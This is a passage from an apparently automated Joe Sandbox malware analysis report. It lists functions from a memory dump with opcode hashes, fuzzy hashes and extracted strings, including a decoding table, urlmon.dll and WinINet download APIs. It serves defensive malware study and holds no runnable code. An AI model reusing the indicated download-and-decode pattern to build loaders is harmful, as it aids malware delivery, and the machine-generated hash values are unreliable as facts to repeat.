                                                                                                                                                              Function 0502A802 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f86f1802c4487a8383a93b9429c05b4bfacb1b61ada847f2ddd72e82896268b1
                                                                                                                                                              • Instruction ID: 4b77cd379624070139938acece5a7fe96303852b08baf32281c5b30ee33ce4f6
                                                                                                                                                              • Opcode Fuzzy Hash: f86f1802c4487a8383a93b9429c05b4bfacb1b61ada847f2ddd72e82896268b1
                                                                                                                                                              • Instruction Fuzzy Hash: E601DBB2D11219AEDB40DFE8D941AEEBBF8BB18200F14456AD916F3240F77556048FA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0500B102 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 24fce06f69b3e886d7ecd5ca67a116bd849139378026a2bb1b24c1e30855f722
                                                                                                                                                              • Instruction ID: 6f88ea5bdd2c9f141bc75dde82cbafa1e6ea94b0f1785205151dac4b8ec4774f
                                                                                                                                                              • Opcode Fuzzy Hash: 24fce06f69b3e886d7ecd5ca67a116bd849139378026a2bb1b24c1e30855f722
                                                                                                                                                              • Instruction Fuzzy Hash: FCF0A77360821667E7105E5DFC84BDEB7DCEB94234F641222FD5CC7281E672D45183A0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502BDD2 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 99220681ae503c1c86135b68b1739e6af2fef04691cf5efe1e2fb6b28a03665f
                                                                                                                                                              • Instruction ID: be11337224e1545369b9c1e29b880719ce1ff608d351108785aa84b10ddc1424
                                                                                                                                                              • Opcode Fuzzy Hash: 99220681ae503c1c86135b68b1739e6af2fef04691cf5efe1e2fb6b28a03665f
                                                                                                                                                              • Instruction Fuzzy Hash: 2DF0F8762002147BDA10EF99DC85EDB77ACEF89750F008409FA58A7241D670BD128BB1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502BDD1 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c02816e2d077b2268a5657d0bdaec4d3d8f1ff38e9e14fdb59576569c1ece577
                                                                                                                                                              • Instruction ID: a2c8cb2b5a5a4f5bf63c67f746a6bca4422e98db64c9d3190a5187f91114ea59
                                                                                                                                                              • Opcode Fuzzy Hash: c02816e2d077b2268a5657d0bdaec4d3d8f1ff38e9e14fdb59576569c1ece577
                                                                                                                                                              • Instruction Fuzzy Hash: 8CF0D4762002147FDB10DFA8EC85EEB77A9AF89750F108409F958A7241C670A912CBA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0501E92B Relevance: .0, Instructions: 32COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 94dab3f7bb9a57e61d653ab3ac18a72d3ec1bf341e3282b907964e28cf5dc204
                                                                                                                                                              • Instruction ID: de983e526a3d6a6bac870b08d3501372cdb1a4c84e4b9768fa08e44633191a17
                                                                                                                                                              • Opcode Fuzzy Hash: 94dab3f7bb9a57e61d653ab3ac18a72d3ec1bf341e3282b907964e28cf5dc204
                                                                                                                                                              • Instruction Fuzzy Hash: DDF08972A092187EDB10FAE0FC89EBF73ECEB5C300F004198BD0956141E5719D948B66
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0500B0F6 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 52652f755e0239335d7e0c9f2f31dc2560785eedc066fb10087deb5c5cb5c027
                                                                                                                                                              • Instruction ID: 0695a9ca597bb3270dbaaea9dbf63d050816aab18997691da00ba2ddaa0c7457
                                                                                                                                                              • Opcode Fuzzy Hash: 52652f755e0239335d7e0c9f2f31dc2560785eedc066fb10087deb5c5cb5c027
                                                                                                                                                              • Instruction Fuzzy Hash: C8E0207391411667D7105E5DBC404CEF7DCFB99630B690321FD5C5B141EA31D51283E0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502C932 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                                                                                                              • Instruction ID: a3a0d17bc1f61793db15bf25ea219ba0bc8bcad697fc0496f072904d42601f01
                                                                                                                                                              • Opcode Fuzzy Hash: 724edec358f2f41a1d8b2e1c973ed9c8748d8b2567d1867b73260787005ea862
                                                                                                                                                              • Instruction Fuzzy Hash: 1CE039B2204214BBDA10EF98EC45EEB77ACEFC8710F408009F948A7241CA30BD108BB4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0501E892 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 3730f5dc3728701d42672302817a598620070277b495da7cab1aff6921fe3075
                                                                                                                                                              • Instruction ID: d6a04f565799eb79ab4c5bbf2684f231dc2c41839f172a874b9515b00bf484bd
                                                                                                                                                              • Opcode Fuzzy Hash: 3730f5dc3728701d42672302817a598620070277b495da7cab1aff6921fe3075
                                                                                                                                                              • Instruction Fuzzy Hash: A1F08271D05208EBDB14DF64E841BDDBBB8EB04320F208769EC289B2C0E63497548785
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502E582 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: f022972c77df0932d532436e3505407cb305c153742fee5d9610ae40e268c33a
                                                                                                                                                              • Instruction ID: c3b8a259d6340223b72c9b7bff857a80c9885fa6c802542d06799050c35e8a6f
                                                                                                                                                              • Opcode Fuzzy Hash: f022972c77df0932d532436e3505407cb305c153742fee5d9610ae40e268c33a
                                                                                                                                                              • Instruction Fuzzy Hash: DDE04F3679023437D2206589AC09FAF779C9BD1A61F09006CFE0C9B280E574A90142E5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502C672 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                                                                                                              • Instruction ID: c88367a5740ded28fc08f0488378df4cdeda0282441a214b8dfdd69f23079aac
                                                                                                                                                              • Opcode Fuzzy Hash: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                                                                                                              • Instruction Fuzzy Hash: 35E04F322106147BD520AB59DC04EDBB76CEFC6710F40C019FA4CAB241CA70790587F1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05027EC8 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 54d4a7364494e2267bd5b6b1c45ac9cb3dcedf180a766844a62bdcce78b60066
                                                                                                                                                              • Instruction ID: 4a4e94369949dac5d711a27fcaf6f9990ef01ba2c7212880f3a929aeb7cbe7d4
                                                                                                                                                              • Opcode Fuzzy Hash: 54d4a7364494e2267bd5b6b1c45ac9cb3dcedf180a766844a62bdcce78b60066
                                                                                                                                                              • Instruction Fuzzy Hash: 79E07823D440586F8F01D9D46C809FDB721F5D502075406FEC46947001D421816143A0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 0501AF64 Relevance: 51.4, Strings: 41, Instructions: 169COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                                                                              • API String ID: 0-3248090998
                                                                                                                                                              • Opcode ID: e88199dca5e4d067ebff1195c13137bd4ea258bea35e9c34758cd38092c3f820
                                                                                                                                                              • Instruction ID: a19702dea592be39b514e6827340a69c97a035bda7919558258864c46698782a
                                                                                                                                                              • Opcode Fuzzy Hash: e88199dca5e4d067ebff1195c13137bd4ea258bea35e9c34758cd38092c3f820
                                                                                                                                                              • Instruction Fuzzy Hash: 9F9110F08052A98ECB118F59A4603DFBF71BB95204F1581E9C6A97B243C3BE4E85DF90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0501AF72 Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                                                                              • API String ID: 0-3248090998
                                                                                                                                                              • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                                                                                              • Instruction ID: 36b5d348b450e8179f11e66b55b51ab9330dd9528fd3e3342686ca239af26fef
                                                                                                                                                              • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                                                                                              • Instruction Fuzzy Hash: 60910FF08052A98ECB118F55A5603DFBF71BB95204F1581E9C6AA7B243C3BE4E85DF90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05028872 Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                                                                              • API String ID: 0-1002149817
                                                                                                                                                              • Opcode ID: 9af020e7823f00b86caaf88724b6b3204ec4b7624f7d386393bad56c415ad399
                                                                                                                                                              • Instruction ID: 8be74322262bf0efe4ff2db2e58dffdd258f0fed804d78eca71747c564a3b8cd
                                                                                                                                                              • Opcode Fuzzy Hash: 9af020e7823f00b86caaf88724b6b3204ec4b7624f7d386393bad56c415ad399
                                                                                                                                                              • Instruction Fuzzy Hash: F2C130B0D00228AEDB60DFA5DC44BEEBBB9BF55304F1081D9E54CAB241E7B54A88CF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05028868 Relevance: 31.4, Strings: 25, Instructions: 126COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $$$$%$)$)$5$>$B$E$F$F$H$J$Q$T$g$h$m$s$u$urlmon.dll$v$w$}$}
                                                                                                                                                              • API String ID: 0-881177885
                                                                                                                                                              • Opcode ID: 46d53f3b2e629b3e720c7705bc1f1cee5351d9c919757ce094ad03ac55be819a
                                                                                                                                                              • Instruction ID: 971eed27a9344c5285f9c1c148dcf20c16d61935eef4dbcf83b10ad4614401cb
                                                                                                                                                              • Opcode Fuzzy Hash: 46d53f3b2e629b3e720c7705bc1f1cee5351d9c919757ce094ad03ac55be819a
                                                                                                                                                              • Instruction Fuzzy Hash: F961F4B0D0126CDEEB60DFA5D9487DEBAF5BB05308F108199D15CBB241D7BA0A88CF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05025D32 Relevance: 25.2, Strings: 20, Instructions: 247COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                                                                              • API String ID: 0-3236418099
                                                                                                                                                              • Opcode ID: b37128e2bab29040a809bab8001796936c6387b3db3de6b46d371592fac7086c
                                                                                                                                                              • Instruction ID: ce027826aab9f92b6fb28b9d8a329b691eb33dab31f426ae6c5a7e4b521a9235
                                                                                                                                                              • Opcode Fuzzy Hash: b37128e2bab29040a809bab8001796936c6387b3db3de6b46d371592fac7086c
                                                                                                                                                              • Instruction Fuzzy Hash: 469150B1A00228AAEB20DF94DC85FFEB7BDBF54704F0441A9E50CA6140EB755B89CF65
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05025D24 Relevance: 25.1, Strings: 20, Instructions: 97COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                                                                              • API String ID: 0-3236418099
                                                                                                                                                              • Opcode ID: d7e4e2eb35fdcd4e639ba0ed1665e0295f3908d7d6b7b1f5c22d952b4698a49e
                                                                                                                                                              • Instruction ID: 260134276fb2676e470affde2c0d743f5e251e89d7a3ffa9f8861877f9e31953
                                                                                                                                                              • Opcode Fuzzy Hash: d7e4e2eb35fdcd4e639ba0ed1665e0295f3908d7d6b7b1f5c22d952b4698a49e
                                                                                                                                                              • Instruction Fuzzy Hash: 44411CB0D103289EEB60DFA5D888BEEBBB9BF14744F10419D950CAB241E7B54B88CF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 050238B2 Relevance: 24.1, Strings: 19, Instructions: 320COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $)$C$D$E$F$F$G$R$\$a$c$e$g$i$r$r$v$x
                                                                                                                                                              • API String ID: 0-401266261
                                                                                                                                                              • Opcode ID: 8e2eca0d9a5a8a71c12898f0334cad76fbfefcdc41b2c399c0523deaaf1e376d
                                                                                                                                                              • Instruction ID: 523cfe1016375d392df57ad1bd4aa4870e7647289f6be887b7d271a701dee412
                                                                                                                                                              • Opcode Fuzzy Hash: 8e2eca0d9a5a8a71c12898f0334cad76fbfefcdc41b2c399c0523deaaf1e376d
                                                                                                                                                              • Instruction Fuzzy Hash: 70C187B1D50228AADB20DFA4DC45FEE73BCAF58700F04459DE60DA6180EBB55B84CF65
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05021C72 Relevance: 24.0, Strings: 19, Instructions: 252COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: C$D$I$\$a$a$c$e$e$l$n$o$o$r$r$s$s$t$y
                                                                                                                                                              • API String ID: 0-2101568155
                                                                                                                                                              • Opcode ID: 9195290ee43b9a48f9151e2748935c9aef40a3ea648028b933d406b442efc838
                                                                                                                                                              • Instruction ID: 276c980812dc83c5c934668508350fa8a199118c243e93575e1ace936cb6f35b
                                                                                                                                                              • Opcode Fuzzy Hash: 9195290ee43b9a48f9151e2748935c9aef40a3ea648028b933d406b442efc838
                                                                                                                                                              • Instruction Fuzzy Hash: 34918471A04228AFEB10DF50DC89FFEB7B9FF55700F048199E908A6241E7B59B44CBA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 050238AD Relevance: 24.0, Strings: 19, Instructions: 227COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $)$C$D$E$F$F$G$R$\$a$c$e$g$i$r$r$v$x
                                                                                                                                                              • API String ID: 0-401266261
                                                                                                                                                              • Opcode ID: 08c90c1995a2b9070c2a5c51fc19cd97b0170f52a698769adb99f97b005dc2a5
                                                                                                                                                              • Instruction ID: 8fdfb94b013028e5ecd5d897b98eeed98e5d93420b246c865319723b6ae36139
                                                                                                                                                              • Opcode Fuzzy Hash: 08c90c1995a2b9070c2a5c51fc19cd97b0170f52a698769adb99f97b005dc2a5
                                                                                                                                                              • Instruction Fuzzy Hash: 809142B1D50328AADB60DFA4CC49FEEB7B9EF58700F00419DA50DA6180EBB55A84CF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05021C71 Relevance: 24.0, Strings: 19, Instructions: 210COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: C$D$I$\$a$a$c$e$e$l$n$o$o$r$r$s$s$t$y
                                                                                                                                                              • API String ID: 0-2101568155
                                                                                                                                                              • Opcode ID: 428cd83d7ddda123f103c54a7be5e5bc11f6f7df96966f58032f90cf530855e6
                                                                                                                                                              • Instruction ID: 3959118b7be05bc525888ccd8da65f149ebd8fdd62b0ea7420311a6a1b8e0501
                                                                                                                                                              • Opcode Fuzzy Hash: 428cd83d7ddda123f103c54a7be5e5bc11f6f7df96966f58032f90cf530855e6
                                                                                                                                                              • Instruction Fuzzy Hash: E08164B5A00228AFEB10DF50DC89FFEB7BDEF55700F048099E908A6241E7B59B44CB65
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502CECB Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Clos$CloseHandle$File$Http$HttpSendRequestA$Inte$InternetReadFile$ReadFile$Requ$Requ$RequestA$SendRequestA$dle$eHan$estA$rnet$rnetReadFile
                                                                                                                                                              • API String ID: 0-771367364
                                                                                                                                                              • Opcode ID: 5db146491dfedab9a753d7caa867c7fd546305451ed2ae3ac0512e951a969d3a
                                                                                                                                                              • Instruction ID: 3ff348597bc4d05676360fa2ad65decdc13ceaf41234a9be15f46400664d8cd4
                                                                                                                                                              • Opcode Fuzzy Hash: 5db146491dfedab9a753d7caa867c7fd546305451ed2ae3ac0512e951a969d3a
                                                                                                                                                              • Instruction Fuzzy Hash: F34127B290816C7FDB10DF88E9419FEBBB8FB45210F108689FD59A7201D2319E11CBE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05026932 Relevance: 20.1, Strings: 16, Instructions: 86COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
